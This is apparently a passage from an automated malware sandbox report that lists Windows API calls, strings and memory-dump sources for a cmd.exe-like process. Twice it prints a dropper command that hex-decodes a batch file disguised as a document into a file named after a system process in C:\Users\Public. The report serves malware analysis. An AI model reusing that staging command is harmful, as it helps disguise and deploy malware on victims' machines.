                                                                                                            • Part of subcall function 00007FF7AB1336EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB133791
                                                                                                          Similarity
                                                                                                          • API ID: _get_osfhandle$ConsoleWrite$File$ByteCharLockModeMultiSharedWide$AcquireHandleReleaseTypewcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 1356649289-0
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                                          • String ID: :$\
                                                                                                          • API String ID: 3961617410-1166558509
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                                          • API String ID: 2516562204-381716982
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                                          • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                                          • API String ID: 1580871199-2613899276
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                                          • String ID: con
                                                                                                          • API String ID: 689241570-4257191772
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: memset$EnvironmentVariable
                                                                                                          • String ID: DIRCMD
                                                                                                          • API String ID: 1405722092-1465291664
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: File_get_osfhandle$Pointer$BuffersFlushRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 3192234081-0
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9 , xrefs: 00007FF7AB12E00B
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Similarity
                                                                                                          • API ID: Heap$FreeProcess_setjmp
                                                                                                          • String ID: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\F.O Pump Istek,Docx.bat" "C:\\Users\\Public\\spoolsv.MPEG" 9
                                                                                                          • API String ID: 777023205-2363904224
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$iswdigit$wcstol
                                                                                                          • String ID:
                                                                                                          • API String ID: 3841054028-0
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB133578: _get_osfhandle.MSVCRT ref: 00007FF7AB133584
                                                                                                            • Part of subcall function 00007FF7AB133578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB13359C
                                                                                                            • Part of subcall function 00007FF7AB133578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335C3
                                                                                                            • Part of subcall function 00007FF7AB133578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335D9
                                                                                                            • Part of subcall function 00007FF7AB133578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB1335ED
                                                                                                            • Part of subcall function 00007FF7AB133578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7AB1232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF7AB133602
                                                                                                          • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB133514
                                                                                                          • _get_osfhandle.MSVCRT ref: 00007FF7AB133522
                                                                                                          • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB133541
                                                                                                          • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB13355E
                                                                                                            • Part of subcall function 00007FF7AB1336EC: _get_osfhandle.MSVCRT ref: 00007FF7AB133715
                                                                                                            • Part of subcall function 00007FF7AB1336EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7AB133770
                                                                                                            • Part of subcall function 00007FF7AB1336EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7AB133791
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: LockShared$_get_osfhandle$AcquireConsoleFileReleaseWrite$ByteCharHandleModeMultiTypeWide
                                                                                                          • String ID:
                                                                                                          • API String ID: 4057327938-0
                                                                                                          APIs
                                                                                                          • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7AB1454E6
                                                                                                          • CreateMutexExW.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7AB14552E
                                                                                                            • Part of subcall function 00007FF7AB14758C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7AB146999,?,?,?,?,?,00007FF7AB138C39), ref: 00007FF7AB1475AE
                                                                                                            • Part of subcall function 00007FF7AB14758C: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF7AB146999,?,?,?,?,?,00007FF7AB138C39), ref: 00007FF7AB1475C6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$CreateCurrentMutexProcess
                                                                                                          • String ID: Local\SM0:%d:%d:%hs$wil$x
                                                                                                          • API String ID: 779401067-630742106
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                          • String ID: Software\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                          • API String ID: 3677997916-3870813718
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: memsetwcsrchr$wcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 110935159-0
                                                                                                          APIs
                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF7AB12B4BD
                                                                                                            • Part of subcall function 00007FF7AB1306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306D6
                                                                                                            • Part of subcall function 00007FF7AB1306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306F0
                                                                                                            • Part of subcall function 00007FF7AB1306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB13074D
                                                                                                            • Part of subcall function 00007FF7AB1306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB130762
                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF7AB12B518
                                                                                                          • _wcsicmp.MSVCRT ref: 00007FF7AB12B58B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          Similarity
                                                                                                          • API ID: Heap$_wcsicmp$AllocProcess
                                                                                                          • String ID: ELSE$IF/?
                                                                                                          • API String ID: 3223794493-1134991328
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A77A
                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A7AF
                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A80E
                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A839
                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7AB149A82), ref: 00007FF7AB14A850
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue$CloseErrorLastOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 2240656346-0
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB1301B8: _get_osfhandle.MSVCRT ref: 00007FF7AB1301C4
                                                                                                            • Part of subcall function 00007FF7AB1301B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7AB13E904,?,?,?,?,00000000,00007FF7AB133491,?,?,?,00007FF7AB144420), ref: 00007FF7AB1301D6
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7AB14D0F9
                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7AB14D10F
                                                                                                          • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7AB14D166
                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7AB14D17A
                                                                                                          • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7AB14D18C
                                                                                                          Similarity
                                                                                                          • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3008996577-0
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: CreateSemaphore
                                                                                                          • String ID: _p0$wil
                                                                                                          • API String ID: 1078844751-1814513734
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: memset$DiskFreeSpace
                                                                                                          • String ID: %5lu
                                                                                                          • API String ID: 2448137811-2100233843
                                                                                                          APIs
                                                                                                          • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF7AB14B934
                                                                                                          • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7AB135085), ref: 00007FF7AB14B9A5
                                                                                                          • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7AB135085), ref: 00007FF7AB14B9F7
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                                          • String ID: %WINDOWS_COPYRIGHT%
                                                                                                          • API String ID: 1103618819-1745581171
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: memset$_wcslwr
                                                                                                          • String ID: [%s]
                                                                                                          • API String ID: 886762496-302437576
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: fprintf
                                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                          • API String ID: 383729395-2781220306
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                          • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                                          • API String ID: 1646373207-2530943252
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                          • String ID: RaiseFailFastException$kernelbase.dll
                                                                                                          • API String ID: 1646373207-919018592
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: _wcsnicmp$wcschr
                                                                                                          • String ID:
                                                                                                          • API String ID: 3270668897-0
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: memset$DriveFullNamePathType
                                                                                                          • String ID:
                                                                                                          • API String ID: 3442494845-0
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                          • String ID:
                                                                                                          • API String ID: 140117192-0
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: wcstol$lstrcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 3515581199-0
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: File_get_osfhandle$TimeWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 4019809305-0
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: memset$DriveNamePathTypeVolume
                                                                                                          • String ID:
                                                                                                          • API String ID: 1029679093-0
                                                                                                          APIs
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 1617791916-0
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB1306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306D6
                                                                                                            • Part of subcall function 00007FF7AB1306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB1306F0
                                                                                                            • Part of subcall function 00007FF7AB1306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB13074D
                                                                                                            • Part of subcall function 00007FF7AB1306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7AB12B4DB), ref: 00007FF7AB130762
                                                                                                            • Part of subcall function 00007FF7AB12EF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7AB12E626,?,?,00000000,00007FF7AB131F69), ref: 00007FF7AB12F000
                                                                                                            • Part of subcall function 00007FF7AB12EF40: wcschr.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F031
                                                                                                            • Part of subcall function 00007FF7AB12EF40: iswdigit.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB12F0D6
                                                                                                          • longjmp.MSVCRT ref: 00007FF7AB13CCBC
                                                                                                          • longjmp.MSVCRT(?,?,00000000,00007FF7AB131F69,?,?,?,?,?,?,?,00007FF7AB12286E,00000000,00000000,00000000,00000000), ref: 00007FF7AB13CCE0
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000006.00000002.1483875120.00007FF7AB121000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7AB120000, based on PE: true
                                                                                                          • Associated: 00000006.00000002.1483826557.00007FF7AB120000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB15D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB161000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB16F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484057368.00007FF7AB174000.00000004.00000001.01000000.00000004.sdmp
                                                                                                          • Associated: 00000006.00000002.1484163153.00007FF7AB179000.00000002.00000001.01000000.00000004.sdmp
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_6_2_7ff7ab120000_alpha.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                                                          • String ID: GeToken: (%x) '%s'
                                                                                                          • API String ID: 3282654869-1994581435
                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF7AB12CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDA6
                                                                                                            • Part of subcall function 00007FF7AB12CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7AB12B9A1,?,?,?,?,00007FF7AB12D81A), ref: 00007FF7AB12CDBD
                                                                                                          • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7AB14827A), ref: 00007FF7AB1511DC
                                                                                                          • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF7AB14827A), ref: 00007FF7AB151277
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: Heap$AllocProcessmemmovewcschr
                                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                                          • API String ID: 1135967885-381716982
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: memmovewcsncmp
                                                                                                          • String ID: 0123456789
                                                                                                          • API String ID: 3879766669-2793719750
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB1497D0
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D46E
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D485
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D4EE
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: iswspace.MSVCRT ref: 00007FF7AB12D54D
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D569
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D58C
                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB1498D7
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                          • String ID: Software\Classes
                                                                                                          • API String ID: 2714550308-1656466771
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB14A0FC
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D46E
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7AB12D485
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D4EE
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: iswspace.MSVCRT ref: 00007FF7AB12D54D
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D569
                                                                                                            • Part of subcall function 00007FF7AB12D3F0: wcschr.MSVCRT ref: 00007FF7AB12D58C
                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7AB14A1FB
                                                                                                          Strings
                                                                                                          Similarity
                                                                                                          • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                          • String ID: Software\Classes
                                                                                                          • API String ID: 2714550308-1656466771